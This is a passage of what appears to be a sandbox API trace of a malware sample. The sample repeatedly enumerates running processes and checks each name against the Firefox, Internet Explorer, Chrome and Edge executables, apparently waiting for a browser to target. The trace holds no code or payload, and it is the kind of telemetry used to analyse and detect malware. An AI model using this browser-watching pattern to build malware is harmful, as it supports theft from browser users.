[0228.372] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0228.372] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0228.373] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0228.373] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0228.373] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0228.373] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.373] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0228.373] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0228.373] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0228.373] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0228.373] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0228.373] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0228.374] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0228.374] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0228.374] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0228.374] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0228.374] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0228.374] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0228.374] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0228.374] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0228.374] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.374] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0228.375] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0228.375] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0228.375] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0228.375] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.375] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0228.375] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0228.375] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0228.375] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0228.375] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.375] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0228.376] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0228.376] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0228.376] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0228.376] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.376] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0228.377] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0228.377] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0228.377] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0228.377] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0228.377] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0228.377] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0228.377] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0228.377] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0228.377] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.377] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0228.378] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0228.378] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0228.378] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0228.378] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.378] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0228.378] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0228.378] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0228.378] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0228.378] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.379] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0228.379] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0228.379] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0228.379] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0228.379] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.379] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0228.380] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0228.380] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0228.380] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0228.380] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.380] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0228.380] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0228.380] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0228.380] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0228.380] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0228.380] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0228.381] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0228.381] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0228.381] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0228.381] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0228.381] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0228.381] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0228.381] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0228.381] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0228.381] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0228.381] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0228.382] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0228.382] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0228.382] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0228.382] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.382] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0228.383] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0228.383] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0228.383] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0228.383] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0228.383] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0228.383] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0228.383] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0228.383] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0228.383] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.383] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0228.384] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0228.384] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0228.384] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0228.384] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.384] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.384] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0228.384] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0228.384] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0228.384] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.384] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0228.385] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0228.385] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0228.385] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0228.385] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.385] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.386] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0228.386] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0228.386] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0228.386] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.386] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0228.386] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0228.386] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0228.386] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0228.386] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.386] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0228.387] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0228.387] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0228.387] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0228.387] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0228.387] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0228.387] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0228.387] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0228.387] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0228.387] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.387] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0228.388] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0228.388] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0228.388] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0228.388] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.388] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0228.389] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0228.389] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0228.389] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0228.389] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0228.389] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0228.389] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0228.389] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0228.389] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0228.389] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0228.389] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0228.390] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0228.390] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0228.390] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0228.390] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0228.390] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0228.390] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0228.390] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0228.390] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0228.390] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0228.390] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0228.391] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0228.391] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0228.391] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0228.391] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0228.391] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0228.391] CloseHandle (hObject=0xd4) returned 1 [0228.391] Sleep (dwMilliseconds=0x3e8) [0229.400] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0229.402] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0229.402] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0229.402] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0229.402] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0229.402] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0229.402] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0229.403] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0229.403] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0229.403] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0229.403] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0229.403] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0229.403] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0229.403] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0229.403] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0229.403] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.403] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0229.404] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0229.404] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0229.404] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0229.404] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0229.404] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0229.404] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0229.404] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0229.404] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0229.405] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.405] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0229.405] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0229.405] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0229.405] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0229.405] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0229.405] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0229.406] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0229.406] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0229.406] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0229.406] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.406] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0229.406] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0229.406] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0229.406] lstrcmpiA (lpString1="services.exe", 